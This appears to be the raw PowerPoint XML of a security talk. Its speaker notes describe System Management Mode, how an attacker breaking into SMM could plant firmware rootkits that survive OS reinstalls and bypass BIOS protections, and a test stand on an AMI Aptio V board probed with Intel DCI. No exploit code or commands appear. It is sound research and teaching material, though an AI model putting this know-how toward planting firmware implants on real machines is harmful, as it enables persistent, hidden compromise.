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09" r:id="rId4"/>
    <p:sldMasterId id="2147483710" r:id="rId5"/>
    <p:sldMasterId id="2147483711" r:id="rId6"/>
    <p:sldMasterId id="2147483712" r:id="rId7"/>
    <p:sldMasterId id="2147483713"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Lst>
  <p:sldSz cy="6858000" cx="12192000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Roboto Condensed"/>
      <p:regular r:id="rId64"/>
      <p:bold r:id="rId65"/>
      <p:italic r:id="rId66"/>
      <p:boldItalic r:id="rId67"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Condensed Light"/>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1C194A9-4016-4AD4-BD18-990939A0B66A}">
  <a:tblStyle styleId="{71C194A9-4016-4AD4-BD18-990939A0B66A}" styleName="Table_0">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71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoCondensedLight-boldItalic.fntdata"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoCondensedLight-italic.fntdata"/><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font" Target="fonts/RobotoCondensed-regular.fntdata"/><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font" Target="fonts/RobotoCondensed-italic.fntdata"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide12.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoCondensed-bold.fntdata"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoCondensedLight-regular.fntdata"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide14.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoCondensed-boldItalic.fntdata"/><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font" Target="fonts/RobotoCondensedLight-bold.fntdata"/><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indent="69850" lvl="0" marL="0"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1pPr>
            <a:lvl2pPr indent="69850" lvl="1" marL="457200"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2pPr>
            <a:lvl3pPr indent="69850" lvl="2" marL="914400"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3pPr>
            <a:lvl4pPr indent="69850" lvl="3" marL="1371600"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4pPr>
            <a:lvl5pPr indent="69850" lvl="4" marL="1828800"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5pPr>
            <a:lvl6pPr indent="69850" lvl="5" marL="2286000"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6pPr>
            <a:lvl7pPr indent="69850" lvl="6" marL="2743200"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7pPr>
            <a:lvl8pPr indent="69850" lvl="7" marL="3200400"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8pPr>
            <a:lvl9pPr indent="69850" lvl="8" marL="3657600"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Shape 266"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Thank you all very much for coming today at this talk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="Shape 267"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="268" name="Shape 26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Shape 344"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>The SMM is used within the BIOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>, it allows runtime handling system management tasks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>While booting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>, the initialization routines places the SMM code into the special area of operating memory called SMRAM, then locks it down from access f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>rom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t> other CPU modes excluding the SMM itself. Thus the SMM code is located inside hidden SMRAM space.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>To transfer CPU to SMM the System Management Interrupts or SMIs are used. Any SMI is initiated as a hardware signal, but there are a software way to generate one.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="345" name="Shape 345"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="346" name="Shape 34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Shape 353"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>So if an attacker manages to break in SMM, it gains full capabilities of such environment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>The injection will be completely isolated from OS, can execute in parallel with OS and can have full access to hardware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>As I’ve already told such vulnerability could be used to bypass almost every known BIOS protection mechanism, update authentication and even chain-of-trusts which are not using hardware root-of-trusts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Such rootkit will of course survive an OS or hardware drive reinstall.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="354" name="Shape 354"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="355" name="Shape 35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Shape 361"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Alex Matrosov has already described </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>the real </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>attack scenario that is used for placing such rootkits into the SPI flash memory and even desc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>ribed some real NSA UEFI BIOS implants.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="362" name="Shape 362"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="363" name="Shape 36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Shape 371"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>If you want to find more details on the SMM, please, follow these sources.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="372" name="Shape 372"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="373" name="Shape 37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Shape 379"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>For now, let’s move to the research.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380" name="Shape 380"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="381" name="Shape 38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Shape 386"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Finding the SMM vulnerability requires a stand, and here it is, based on Gigabyte motherboard with Q170 series chipset with latest BIOS version, not much protection mechanisms applied (btw that really hepls while experimenting).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>BIOS itself is based on AMI Aptio V which is very popular, so there a chance that the issue would be actual for many systems vendors.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387" name="Shape 387"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="388" name="Shape 38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Shape 395"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>During the research we’ve decided to try not just common tools for UEFI BIOS analysis (such as UEFItool, disassembler, CHIPSEC), but to experience something new, like Intel DCI technology.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="396" name="Shape 396"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="397" name="Shape 39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Shape 404"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>ou might be wondering what is Intel DCI, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>so let’s talk about that too.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="405" name="Shape 405"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="406" name="Shape 40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Shape 411"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>In a nutshell, Intel DCI is a technology that allows low-level processor debugging without putting much effort in the process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>There are a few ways to enable it. The easy way is...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="412" name="Shape 412"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
